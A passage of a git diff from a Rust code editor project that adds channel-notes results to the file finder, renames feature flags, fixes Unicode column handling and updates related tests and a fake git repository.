.icon_position(IconPosition::End) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) 
.on_click({ move |_event, _window, cx| { telemetry::event!( @@ -1516,9 +1519,7 @@ impl ExtensionsPage { cx: &mut Context, ) -> impl IntoElement { let docs_url_button = Button::new("open_docs", "View Documentation") - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Small) - .icon_position(IconPosition::End) + .end_icon(Icon::new(IconName::ArrowUpRight).size(IconSize::Small)) .on_click({ move |_event, _window, cx| { telemetry::event!( diff --git a/crates/feature_flags/Cargo.toml b/crates/feature_flags/Cargo.toml index a25ca1629a539a87a7356f0419ef074e9546bc52..960834211ff18980675b236cd0cc2893d563d668 100644 --- a/crates/feature_flags/Cargo.toml +++ b/crates/feature_flags/Cargo.toml @@ -12,5 +12,4 @@ workspace = true path = "src/feature_flags.rs" [dependencies] -futures.workspace = true gpui.workspace = true diff --git a/crates/feature_flags/src/feature_flags.rs b/crates/feature_flags/src/feature_flags.rs index 1d1929ed4cf89abfc5304fa111dfc7ee523d5dd8..5b8af1180aae812ed1475810acc1920a8ec708f1 100644 --- a/crates/feature_flags/src/feature_flags.rs +++ b/crates/feature_flags/src/feature_flags.rs @@ -3,12 +3,8 @@ mod flags; use std::cell::RefCell; use std::rc::Rc; use std::sync::LazyLock; -use std::time::Duration; -use std::{future::Future, pin::Pin, task::Poll}; -use futures::channel::oneshot; -use futures::{FutureExt, select_biased}; -use gpui::{App, Context, Global, Subscription, Task, Window}; +use gpui::{App, Context, Global, Subscription, Window}; pub use flags::*; @@ -122,11 +118,6 @@ pub struct OnFlagsReady { } pub trait FeatureFlagAppExt { - fn wait_for_flag(&mut self) -> WaitForFlag; - - /// Waits for the specified feature flag to resolve, up to the given timeout. 
- fn wait_for_flag_or_timeout(&mut self, timeout: Duration) -> Task; - fn update_flags(&mut self, staff: bool, flags: Vec); fn set_staff(&mut self, staff: bool); fn has_flag(&self) -> bool; @@ -192,54 +183,4 @@ impl FeatureFlagAppExt for App { callback(feature_flags.has_flag::(), cx); }) } - - fn wait_for_flag(&mut self) -> WaitForFlag { - let (tx, rx) = oneshot::channel::(); - let mut tx = Some(tx); - let subscription: Option; - - match self.try_global::() { - Some(feature_flags) => { - subscription = None; - tx.take().unwrap().send(feature_flags.has_flag::()).ok(); - } - None => { - subscription = Some(self.observe_global::(move |cx| { - let feature_flags = cx.global::(); - if let Some(tx) = tx.take() { - tx.send(feature_flags.has_flag::()).ok(); - } - })); - } - } - - WaitForFlag(rx, subscription) - } - - fn wait_for_flag_or_timeout(&mut self, timeout: Duration) -> Task { - let wait_for_flag = self.wait_for_flag::(); - - self.spawn(async move |cx| { - let mut wait_for_flag = wait_for_flag.fuse(); - let mut timeout = FutureExt::fuse(cx.background_executor().timer(timeout)); - - select_biased! 
{ - is_enabled = wait_for_flag => is_enabled, - _ = timeout => false, - } - }) - } -} - -pub struct WaitForFlag(oneshot::Receiver, Option); - -impl Future for WaitForFlag { - type Output = bool; - - fn poll(mut self: Pin<&mut Self>, cx: &mut core::task::Context<'_>) -> Poll { - self.0.poll_unpin(cx).map(|result| { - self.1.take(); - result.unwrap_or(false) - }) - } } diff --git a/crates/feature_flags/src/flags.rs b/crates/feature_flags/src/flags.rs index 087e76c4129254d3b6f488259bc8fa19aa91370d..54dc96ad37f8e51a1074a0a32976f8236cb1a0ed 100644 --- a/crates/feature_flags/src/flags.rs +++ b/crates/feature_flags/src/flags.rs @@ -37,36 +37,40 @@ impl FeatureFlag for AgentSharingFeatureFlag { const NAME: &'static str = "agent-sharing"; } -pub struct SubagentsFeatureFlag; +pub struct DiffReviewFeatureFlag; -impl FeatureFlag for SubagentsFeatureFlag { - const NAME: &'static str = "subagents"; +impl FeatureFlag for DiffReviewFeatureFlag { + const NAME: &'static str = "diff-review"; fn enabled_for_staff() -> bool { - true + false } } -pub struct DiffReviewFeatureFlag; +pub struct StreamingEditFileToolFeatureFlag; -impl FeatureFlag for DiffReviewFeatureFlag { - const NAME: &'static str = "diff-review"; +impl FeatureFlag for StreamingEditFileToolFeatureFlag { + const NAME: &'static str = "streaming-edit-file-tool"; fn enabled_for_staff() -> bool { - false + true } } -pub struct GitGraphFeatureFlag; +pub struct UpdatePlanToolFeatureFlag; -impl FeatureFlag for GitGraphFeatureFlag { - const NAME: &'static str = "git-graph"; +impl FeatureFlag for UpdatePlanToolFeatureFlag { + const NAME: &'static str = "update-plan-tool"; + + fn enabled_for_staff() -> bool { + false + } } -pub struct StreamingEditFileToolFeatureFlag; +pub struct ProjectPanelUndoRedoFeatureFlag; -impl FeatureFlag for StreamingEditFileToolFeatureFlag { - const NAME: &'static str = "streaming-edit-file-tool"; +impl FeatureFlag for ProjectPanelUndoRedoFeatureFlag { + const NAME: &'static str = 
"project-panel-undo-redo"; fn enabled_for_staff() -> bool { false diff --git a/crates/feedback/Cargo.toml b/crates/feedback/Cargo.toml index 0a53a1b6f38d1af0a6b913d61969d4df105a6a10..c2279d778865cb819a5b0e2e494ad9d1e4470067 100644 --- a/crates/feedback/Cargo.toml +++ b/crates/feedback/Cargo.toml @@ -22,5 +22,3 @@ util.workspace = true workspace.workspace = true zed_actions.workspace = true -[dev-dependencies] -editor = { workspace = true, features = ["test-support"] } diff --git a/crates/file_finder/Cargo.toml b/crates/file_finder/Cargo.toml index 8800c7cdcb86735e3b884bd7bd1fbbf5a0522174..5eb36f0f5150263629b407dbe07dc73b6eff31cf 100644 --- a/crates/file_finder/Cargo.toml +++ b/crates/file_finder/Cargo.toml @@ -14,6 +14,8 @@ doctest = false [dependencies] anyhow.workspace = true +channel.workspace = true +client.workspace = true collections.workspace = true editor.workspace = true file_icons.workspace = true @@ -26,7 +28,6 @@ picker.workspace = true project.workspace = true settings.workspace = true serde.workspace = true -text.workspace = true theme.workspace = true ui.workspace = true util.workspace = true @@ -38,10 +39,12 @@ project_panel.workspace = true ctor.workspace = true editor = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } -language = { workspace = true, features = ["test-support"] } + picker = { workspace = true, features = ["test-support"] } pretty_assertions.workspace = true serde_json.workspace = true theme = { workspace = true, features = ["test-support"] } workspace = { workspace = true, features = ["test-support"] } zlog.workspace = true +remote_connection = { workspace = true, features = ["test-support"] } +theme_settings = { workspace = true, features = ["test-support"] } \ No newline at end of file diff --git a/crates/file_finder/src/file_finder.rs b/crates/file_finder/src/file_finder.rs index a1e64964ff578ed263e9e89a610997423f33f7c0..4302669ddc11c94f7df128534217d00c27ef083a 100644 --- 
a/crates/file_finder/src/file_finder.rs +++ b/crates/file_finder/src/file_finder.rs @@ -4,10 +4,12 @@ mod file_finder_tests; use futures::future::join_all; pub use open_path_prompt::OpenPathDelegate; +use channel::ChannelStore; +use client::ChannelId; use collections::HashMap; use editor::Editor; use file_icons::FileIcons; -use fuzzy::{CharBag, PathMatch, PathMatchCandidate}; +use fuzzy::{CharBag, PathMatch, PathMatchCandidate, StringMatch, StringMatchCandidate}; use gpui::{ Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, KeyContext, Modifiers, ModifiersChangedEvent, ParentElement, Render, Styled, Task, WeakEntity, @@ -33,7 +35,6 @@ use std::{ atomic::{self, AtomicBool}, }, }; -use text::Point; use ui::{ ButtonLike, ContextMenu, HighlightedLabel, Indicator, KeyBinding, ListItem, ListItemSpacing, PopoverMenu, PopoverMenuHandle, TintColor, Tooltip, prelude::*, @@ -45,8 +46,8 @@ use util::{ rel_path::RelPath, }; use workspace::{ - ModalView, OpenOptions, OpenVisible, SplitDirection, Workspace, item::PreviewTabsSettings, - notifications::NotifyResultExt, pane, + ModalView, OpenChannelNotesById, OpenOptions, OpenVisible, SplitDirection, Workspace, + item::PreviewTabsSettings, notifications::NotifyResultExt, pane, }; use zed_actions::search::ToggleIncludeIgnored; @@ -321,7 +322,7 @@ impl FileFinder { if let Some(workspace) = delegate.workspace.upgrade() && let Some(m) = delegate.matches.get(delegate.selected_index()) { - let path = match &m { + let path = match m { Match::History { path, .. } => { let worktree_id = path.project.worktree_id; ProjectPath { @@ -334,6 +335,7 @@ impl FileFinder { path: m.0.path.clone(), }, Match::CreateNew(p) => p.clone(), + Match::Channel { .. 
} => return, }; let open_task = workspace.update(cx, move |workspace, cx| { workspace.split_path_preview(path, false, Some(split_direction), window, cx) @@ -392,6 +394,7 @@ pub struct FileFinderDelegate { file_finder: WeakEntity, workspace: WeakEntity, project: Entity, + channel_store: Option>, search_count: usize, latest_search_id: usize, latest_search_did_cancel: bool, @@ -450,13 +453,18 @@ struct Matches { matches: Vec, } -#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Clone)] +#[derive(Debug, Clone)] enum Match { History { path: FoundPath, panel_match: Option, }, Search(ProjectPanelOrdMatch), + Channel { + channel_id: ChannelId, + channel_name: SharedString, + string_match: StringMatch, + }, CreateNew(ProjectPath), } @@ -465,7 +473,7 @@ impl Match { match self { Match::History { path, .. } => Some(&path.project.path), Match::Search(panel_match) => Some(&panel_match.0.path), - Match::CreateNew(_) => None, + Match::Channel { .. } | Match::CreateNew(_) => None, } } @@ -479,7 +487,7 @@ impl Match { .read(cx) .absolutize(&path_match.path), ), - Match::CreateNew(_) => None, + Match::Channel { .. } | Match::CreateNew(_) => None, } } @@ -487,7 +495,7 @@ impl Match { match self { Match::History { panel_match, .. } => panel_match.as_ref(), Match::Search(panel_match) => Some(panel_match), - Match::CreateNew(_) => None, + Match::Channel { .. 
} | Match::CreateNew(_) => None, } } } @@ -554,18 +562,21 @@ impl Matches { .extend(history_items.into_iter().map(path_to_entry)); return; }; - // If several worktress are open we have to set the worktree root names in path prefix - let several_worktrees = worktree_store.read(cx).worktrees().count() > 1; - let worktree_name_by_id = several_worktrees.then(|| { - worktree_store - .read(cx) - .worktrees() - .map(|worktree| { - let snapshot = worktree.read(cx).snapshot(); - (snapshot.id(), snapshot.root_name().into()) - }) - .collect() - }); + + let worktree_name_by_id = if should_hide_root_in_entry_path(&worktree_store, cx) { + None + } else { + Some( + worktree_store + .read(cx) + .worktrees() + .map(|worktree| { + let snapshot = worktree.read(cx).snapshot(); + (snapshot.id(), snapshot.root_name().into()) + }) + .collect(), + ) + }; let new_history_matches = matching_history_items( history_items, currently_opened, @@ -628,7 +639,6 @@ impl Matches { (_, Match::CreateNew(_)) => return cmp::Ordering::Greater, _ => {} } - debug_assert!(a.panel_match().is_some() && b.panel_match().is_some()); match (&a, &b) { // bubble currently opened files to the top @@ -651,32 +661,35 @@ impl Matches { } } - let a_panel_match = match a.panel_match() { - Some(pm) => pm, - None => { - return if b.panel_match().is_some() { - cmp::Ordering::Less - } else { - cmp::Ordering::Equal - }; + // For file-vs-file matches, use the existing detailed comparison. 
+ if let (Some(a_panel), Some(b_panel)) = (a.panel_match(), b.panel_match()) { + let a_in_filename = Self::is_filename_match(a_panel); + let b_in_filename = Self::is_filename_match(b_panel); + + match (a_in_filename, b_in_filename) { + (true, false) => return cmp::Ordering::Greater, + (false, true) => return cmp::Ordering::Less, + _ => {} } - }; - let b_panel_match = match b.panel_match() { - Some(pm) => pm, - None => return cmp::Ordering::Greater, - }; + return a_panel.cmp(b_panel); + } - let a_in_filename = Self::is_filename_match(a_panel_match); - let b_in_filename = Self::is_filename_match(b_panel_match); + let a_score = Self::match_score(a); + let b_score = Self::match_score(b); + // When at least one side is a channel, compare by raw score. + a_score + .partial_cmp(&b_score) + .unwrap_or(cmp::Ordering::Equal) + } - match (a_in_filename, b_in_filename) { - (true, false) => return cmp::Ordering::Greater, - (false, true) => return cmp::Ordering::Less, - _ => {} // Both are filename matches or both are path matches + fn match_score(m: &Match) -> f64 { + match m { + Match::History { panel_match, .. } => panel_match.as_ref().map_or(0.0, |pm| pm.0.score), + Match::Search(pm) => pm.0.score, + Match::Channel { string_match, .. 
} => string_match.score, + Match::CreateNew(_) => 0.0, } - - a_panel_match.cmp(b_panel_match) } /// Determines if the match occurred within the filename rather than in the path @@ -786,6 +799,16 @@ fn matching_history_items<'a>( matching_history_paths } +fn should_hide_root_in_entry_path(worktree_store: &Entity, cx: &App) -> bool { + let multiple_worktrees = worktree_store + .read(cx) + .visible_worktrees(cx) + .filter(|worktree| !worktree.read(cx).is_single_file()) + .nth(1) + .is_some(); + ProjectPanelSettings::get_global(cx).hide_root && !multiple_worktrees +} + #[derive(Debug, Clone, PartialEq, Eq, PartialOrd, Ord, Hash)] struct FoundPath { project: ProjectPath, @@ -833,10 +856,16 @@ impl FileFinderDelegate { cx: &mut Context, ) -> Self { Self::subscribe_to_updates(&project, window, cx); + let channel_store = if FileFinderSettings::get_global(cx).include_channels { + ChannelStore::try_global(cx) + } else { + None + }; Self { file_finder, workspace, project, + channel_store, search_count: 0, latest_search_id: 0, latest_search_did_cancel: false, @@ -885,14 +914,12 @@ impl FileFinderDelegate { .currently_opened_path .as_ref() .map(|found_path| Arc::clone(&found_path.project.path)); - let worktrees = self - .project - .read(cx) - .worktree_store() + let worktree_store = self.project.read(cx).worktree_store(); + let worktrees = worktree_store .read(cx) .visible_worktrees_and_single_files(cx) .collect::>(); - let include_root_name = worktrees.len() > 1; + let include_root_name = !should_hide_root_in_entry_path(&worktree_store, cx); let candidate_sets = worktrees .into_iter() .map(|worktree| { @@ -971,6 +998,68 @@ impl FileFinderDelegate { path_style, ); + // Add channel matches + if let Some(channel_store) = &self.channel_store { + let channel_store = channel_store.read(cx); + let channels: Vec<_> = channel_store.channels().cloned().collect(); + if !channels.is_empty() { + let candidates = channels + .iter() + .enumerate() + .map(|(id, channel)| 
StringMatchCandidate::new(id, &channel.name)); + let channel_query = query.path_query(); + let query_lower = channel_query.to_lowercase(); + let mut channel_matches = Vec::new(); + for candidate in candidates { + let channel_name = candidate.string; + let name_lower = channel_name.to_lowercase(); + + let mut positions = Vec::new(); + let mut query_idx = 0; + for (name_idx, name_char) in name_lower.char_indices() { + if query_idx < query_lower.len() { + let query_char = + query_lower[query_idx..].chars().next().unwrap_or_default(); + if name_char == query_char { + positions.push(name_idx); + query_idx += query_char.len_utf8(); + } + } + } + + if query_idx == query_lower.len() { + let channel = &channels[candidate.id]; + let score = if name_lower == query_lower { + 1.0 + } else if name_lower.starts_with(&query_lower) { + 0.8 + } else { + 0.5 * (query_lower.len() as f64 / name_lower.len() as f64) + }; + channel_matches.push(Match::Channel { + channel_id: channel.id, + channel_name: channel.name.clone(), + string_match: StringMatch { + candidate_id: candidate.id, + score, + positions, + string: channel_name, + }, + }); + } + } + for channel_match in channel_matches { + match self + .matches + .position(&channel_match, self.currently_opened_path.as_ref()) + { + Ok(_duplicate) => {} + Err(ix) => self.matches.matches.insert(ix, channel_match), + } + } + } + } + let query_path = query.raw_query.as_str(); if let Ok(mut query_path) = RelPath::new(Path::new(query_path), path_style) { let available_worktree = self @@ -1056,17 +1145,8 @@ impl FileFinderDelegate { if let Some(panel_match) = panel_match { self.labels_for_path_match(&panel_match.0, path_style) } else if let Some(worktree) = worktree { - let multiple_folders_open = self - .project - .read(cx) - .visible_worktrees(cx) - .filter(|worktree| !worktree.read(cx).is_single_file()) - .nth(1) - .is_some(); - - let full_path = if ProjectPanelSettings::get_global(cx).hide_root - && !multiple_folders_open - { + let 
worktree_store = self.project.read(cx).worktree_store(); + let full_path = if should_hide_root_in_entry_path(&worktree_store, cx) { entry_path.project.path.clone() } else { worktree.read(cx).root_name().join(&entry_path.project.path) @@ -1095,6 +1175,16 @@ impl FileFinderDelegate { } } Match::Search(path_match) => self.labels_for_path_match(&path_match.0, path_style), + Match::Channel { + channel_name, + string_match, + .. + } => ( + channel_name.to_string(), + string_match.positions.clone(), + "Channel Notes".to_string(), + vec![], + ), Match::CreateNew(project_path) => ( format!("Create file: {}", project_path.path.display(path_style)), vec![], @@ -1479,6 +1569,16 @@ impl PickerDelegate for FileFinderDelegate { if let Some(m) = self.matches.get(self.selected_index()) && let Some(workspace) = self.workspace.upgrade() { + // Channel matches are handled separately since they dispatch an action + // rather than directly opening a file path. + if let Match::Channel { channel_id, .. } = m { + let channel_id = channel_id.0; + let finder = self.file_finder.clone(); + window.dispatch_action(OpenChannelNotesById { channel_id }.boxed_clone(), cx); + finder.update(cx, |_, cx| cx.emit(DismissEvent)).log_err(); + return; + } + let open_task = workspace.update(cx, |workspace, cx| { let split_or_open = |workspace: &mut Workspace, @@ -1571,6 +1671,7 @@ impl PickerDelegate for FileFinderDelegate { window, cx, ), + Match::Channel { .. 
} => unreachable!("handled above"), } }); @@ -1598,7 +1699,12 @@ impl PickerDelegate for FileFinderDelegate { active_editor .downgrade() .update_in(cx, |editor, window, cx| { - editor.go_to_singleton_buffer_point(Point::new(row, col), window, cx); + let Some(buffer) = editor.buffer().read(cx).as_singleton() else { + return; + }; + let buffer_snapshot = buffer.read(cx).snapshot(); + let point = buffer_snapshot.point_from_external_input(row, col); + editor.go_to_singleton_buffer_point(point, window, cx); }) .log_err(); } @@ -1627,7 +1733,7 @@ impl PickerDelegate for FileFinderDelegate { let path_match = self.matches.get(ix)?; - let history_icon = match &path_match { + let end_icon = match path_match { Match::History { .. } => Icon::new(IconName::HistoryRerun) .color(Color::Muted) .size(IconSize::Small) @@ -1636,6 +1742,10 @@ impl PickerDelegate for FileFinderDelegate { .flex_none() .size(IconSize::Small.rems()) .into_any_element(), + Match::Channel { .. } => v_flex() + .flex_none() + .size(IconSize::Small.rems()) + .into_any_element(), Match::CreateNew(_) => Icon::new(IconName::Plus) .color(Color::Muted) .size(IconSize::Small) @@ -1643,21 +1753,24 @@ impl PickerDelegate for FileFinderDelegate { }; let (file_name_label, full_path_label) = self.labels_for_match(path_match, window, cx); - let file_icon = maybe!({ - if !settings.file_icons { - return None; - } - let abs_path = path_match.abs_path(&self.project, cx)?; - let file_name = abs_path.file_name()?; - let icon = FileIcons::get_icon(file_name.as_ref(), cx)?; - Some(Icon::from_path(icon).color(Color::Muted)) - }); + let file_icon = match path_match { + Match::Channel { .. 
} => Some(Icon::new(IconName::Hash).color(Color::Muted)), + _ => maybe!({ + if !settings.file_icons { + return None; + } + let abs_path = path_match.abs_path(&self.project, cx)?; + let file_name = abs_path.file_name()?; + let icon = FileIcons::get_icon(file_name.as_ref(), cx)?; + Some(Icon::from_path(icon).color(Color::Muted)) + }), + }; Some( ListItem::new(ix) .spacing(ListItemSpacing::Sparse) .start_slot::(file_icon) - .end_slot::(history_icon) + .end_slot::(end_icon) .inset(true) .toggle_state(selected) .child( diff --git a/crates/file_finder/src/file_finder_tests.rs b/crates/file_finder/src/file_finder_tests.rs index c81d13420b179cc7ce0d8afd2aee26673673f09e..cd9cdeee1ff266717d380aeaecf7cbeb66ec8309 100644 --- a/crates/file_finder/src/file_finder_tests.rs +++ b/crates/file_finder/src/file_finder_tests.rs @@ -400,6 +400,18 @@ async fn test_absolute_paths(cx: &mut TestAppContext) { #[gpui::test] async fn test_complex_path(cx: &mut TestAppContext) { let app_state = init_test(cx); + + cx.update(|cx| { + let settings = *ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state .fs .as_fake() @@ -509,6 +521,91 @@ async fn test_row_column_numbers_query_inside_file(cx: &mut TestAppContext) { }); } +#[gpui::test] +async fn test_row_column_numbers_query_inside_unicode_file(cx: &mut TestAppContext) { + let app_state = init_test(cx); + + let first_file_name = "first.rs"; + let first_file_contents = "aéøbcdef"; + app_state + .fs + .as_fake() + .insert_tree( + path!("/src"), + json!({ + "test": { + first_file_name: first_file_contents, + "second.rs": "// Second Rust file", + } + }), + ) + .await; + + let project = Project::test(app_state.fs.clone(), [path!("/src").as_ref()], cx).await; + + let (picker, workspace, cx) = build_find_picker(project, cx); + + let file_query = &first_file_name[..3]; + let file_row = 1; + let file_column = 5; + let query_inside_file = 
format!("{file_query}:{file_row}:{file_column}"); + picker + .update_in(cx, |finder, window, cx| { + finder + .delegate + .update_matches(query_inside_file.to_string(), window, cx) + }) + .await; + picker.update(cx, |finder, _| { + assert_match_at_position(finder, 1, &query_inside_file.to_string()); + let finder = &finder.delegate; + assert_eq!(finder.matches.len(), 2); + let latest_search_query = finder + .latest_search_query + .as_ref() + .expect("Finder should have a query after the update_matches call"); + assert_eq!(latest_search_query.raw_query, query_inside_file); + assert_eq!(latest_search_query.file_query_end, Some(file_query.len())); + assert_eq!(latest_search_query.path_position.row, Some(file_row)); + assert_eq!(latest_search_query.path_position.column, Some(file_column)); + }); + + cx.dispatch_action(Confirm); + + let editor = cx.update(|_, cx| workspace.read(cx).active_item_as::(cx).unwrap()); + cx.executor().advance_clock(Duration::from_secs(2)); + + let expected_column = first_file_contents + .chars() + .take(file_column as usize - 1) + .map(|character| character.len_utf8()) + .sum::(); + + editor.update(cx, |editor, cx| { + let all_selections = editor.selections.all_adjusted(&editor.display_snapshot(cx)); + assert_eq!( + all_selections.len(), + 1, + "Expected to have 1 selection (caret) after file finder confirm, but got: {all_selections:?}" + ); + let caret_selection = all_selections.into_iter().next().unwrap(); + assert_eq!( + caret_selection.start, caret_selection.end, + "Caret selection should have its start and end at the same position" + ); + assert_eq!( + file_row, + caret_selection.start.row + 1, + "Query inside file should get caret with the same focus row" + ); + assert_eq!( + expected_column, + caret_selection.start.column as usize, + "Query inside file should map user-visible columns to byte offsets for Unicode text" + ); + }); +} + #[gpui::test] async fn test_row_column_numbers_query_outside_file(cx: &mut TestAppContext) { let 
app_state = init_test(cx); @@ -1413,6 +1510,18 @@ async fn test_create_file_no_focused_with_multiple_worktrees(cx: &mut TestAppCon #[gpui::test] async fn test_path_distance_ordering(cx: &mut TestAppContext) { let app_state = init_test(cx); + + cx.update(|cx| { + let settings = *ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state .fs .as_fake() @@ -1648,6 +1757,17 @@ async fn test_query_history(cx: &mut gpui::TestAppContext) { async fn test_history_match_positions(cx: &mut gpui::TestAppContext) { let app_state = init_test(cx); + cx.update(|cx| { + let settings = *ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state .fs .as_fake() @@ -2148,6 +2268,17 @@ async fn test_toggle_panel_new_selections(cx: &mut gpui::TestAppContext) { async fn test_search_preserves_history_items(cx: &mut gpui::TestAppContext) { let app_state = init_test(cx); + cx.update(|cx| { + let settings = *ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state .fs .as_fake() @@ -2253,6 +2384,17 @@ async fn test_search_preserves_history_items(cx: &mut gpui::TestAppContext) { async fn test_search_sorts_history_items(cx: &mut gpui::TestAppContext) { let app_state = init_test(cx); + cx.update(|cx| { + let settings = *ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state .fs .as_fake() @@ -2736,6 +2878,17 @@ async fn test_selected_history_item_stays_selected_on_worktree_updated(cx: &mut async fn test_history_items_vs_very_good_external_match(cx: &mut gpui::TestAppContext) { let app_state = init_test(cx); + cx.update(|cx| { + let settings = 
*ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state .fs .as_fake() @@ -2784,6 +2937,17 @@ async fn test_history_items_vs_very_good_external_match(cx: &mut gpui::TestAppCo async fn test_nonexistent_history_items_not_shown(cx: &mut gpui::TestAppContext) { let app_state = init_test(cx); + cx.update(|cx| { + let settings = *ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state .fs .as_fake() @@ -3183,6 +3347,17 @@ async fn test_history_items_uniqueness_for_multiple_worktree_open_all_files( async fn test_selected_match_stays_selected_after_matches_refreshed(cx: &mut gpui::TestAppContext) { let app_state = init_test(cx); + cx.update(|cx| { + let settings = *ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state.fs.as_fake().insert_tree("/src", json!({})).await; app_state @@ -3614,7 +3789,7 @@ async fn open_queried_buffer( fn init_test(cx: &mut TestAppContext) -> Arc { cx.update(|cx| { let state = AppState::test(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); super::init(cx); editor::init(cx); state @@ -3709,7 +3884,7 @@ impl SearchEntries { fn collect_search_matches(picker: &Picker) -> SearchEntries { let mut search_entries = SearchEntries::default(); for m in &picker.delegate.matches.matches { - match &m { + match m { Match::History { path: history_path, panel_match: path_match, @@ -3734,6 +3909,7 @@ fn collect_search_matches(picker: &Picker) -> SearchEntries search_entries.search_matches.push(path_match.0.clone()); } Match::CreateNew(_) => {} + Match::Channel { .. 
} => {} } } search_entries @@ -3768,6 +3944,7 @@ fn assert_match_at_position( Match::History { path, .. } => path.absolute.file_name().and_then(|s| s.to_str()), Match::Search(path_match) => path_match.0.path.file_name(), Match::CreateNew(project_path) => project_path.path.file_name(), + Match::Channel { channel_name, .. } => Some(channel_name.as_str()), } .unwrap(); assert_eq!(match_file_name, expected_file_name); @@ -3777,6 +3954,17 @@ fn assert_match_at_position( async fn test_filename_precedence(cx: &mut TestAppContext) { let app_state = init_test(cx); + cx.update(|cx| { + let settings = *ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state .fs .as_fake() @@ -3821,6 +4009,18 @@ async fn test_filename_precedence(cx: &mut TestAppContext) { #[gpui::test] async fn test_paths_with_starting_slash(cx: &mut TestAppContext) { let app_state = init_test(cx); + + cx.update(|cx| { + let settings = *ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state .fs .as_fake() diff --git a/crates/fs/Cargo.toml b/crates/fs/Cargo.toml index 6355524e4f328df0ca7fcf24c1df0557676ba6a6..371057c3f8abfd50eea34f0edfcc3e3f7d52df7b 100644 --- a/crates/fs/Cargo.toml +++ b/crates/fs/Cargo.toml @@ -48,6 +48,7 @@ cocoa = "0.26" [target.'cfg(target_os = "windows")'.dependencies] windows.workspace = true +dunce.workspace = true [target.'cfg(any(target_os = "linux", target_os = "freebsd"))'.dependencies] ashpd.workspace = true @@ -58,4 +59,4 @@ gpui = { workspace = true, features = ["test-support"] } git = { workspace = true, features = ["test-support"] } [features] -test-support = ["gpui/test-support", "git/test-support"] +test-support = ["gpui/test-support", "git/test-support", "util/test-support"] diff --git a/crates/fs/src/fake_git_repo.rs b/crates/fs/src/fake_git_repo.rs 
index 12cd67cdae1a250d07468047617c8cc7a52737fa..751796fb83164b78dc5d6789f0ae7870eff16ce1 100644 --- a/crates/fs/src/fake_git_repo.rs +++ b/crates/fs/src/fake_git_repo.rs @@ -8,8 +8,9 @@ use git::{ repository::{ AskPassDelegate, Branch, CommitDataReader, CommitDetails, CommitOptions, FetchOptions, GRAPH_CHUNK_SIZE, GitRepository, GitRepositoryCheckpoint, InitialGraphCommitData, LogOrder, - LogSource, PushOptions, Remote, RepoPath, ResetMode, Worktree, + LogSource, PushOptions, Remote, RepoPath, ResetMode, SearchCommitArgs, Worktree, }, + stash::GitStash, status::{ DiffTreeType, FileStatus, GitStatus, StatusCode, TrackedStatus, TreeDiff, TreeDiffStatus, UnmergedStatus, @@ -20,7 +21,7 @@ use ignore::gitignore::GitignoreBuilder; use parking_lot::Mutex; use rope::Rope; use smol::{channel::Sender, future::FutureExt as _}; -use std::{path::PathBuf, sync::Arc}; +use std::{path::PathBuf, sync::Arc, sync::atomic::AtomicBool}; use text::LineEnding; use util::{paths::PathStyle, rel_path::RelPath}; @@ -32,10 +33,19 @@ pub struct FakeGitRepository { pub(crate) dot_git_path: PathBuf, pub(crate) repository_dir_path: PathBuf, pub(crate) common_dir_path: PathBuf, + pub(crate) is_trusted: Arc, +} + +#[derive(Debug, Clone)] +pub struct FakeCommitSnapshot { + pub head_contents: HashMap, + pub index_contents: HashMap, + pub sha: String, } #[derive(Debug, Clone)] pub struct FakeGitRepositoryState { + pub commit_history: Vec, pub event_emitter: smol::channel::Sender, pub unmerged_paths: HashMap, pub head_contents: HashMap, @@ -52,7 +62,7 @@ pub struct FakeGitRepositoryState { pub simulated_create_worktree_error: Option, pub refs: HashMap, pub graph_commits: Vec>, - pub worktrees: Vec, + pub stash_entries: GitStash, } impl FakeGitRepositoryState { @@ -72,7 +82,8 @@ impl FakeGitRepositoryState { oids: Default::default(), remotes: HashMap::default(), graph_commits: Vec::new(), - worktrees: Vec::new(), + commit_history: Vec::new(), + stash_entries: Default::default(), } } } @@ -215,11 +226,52 
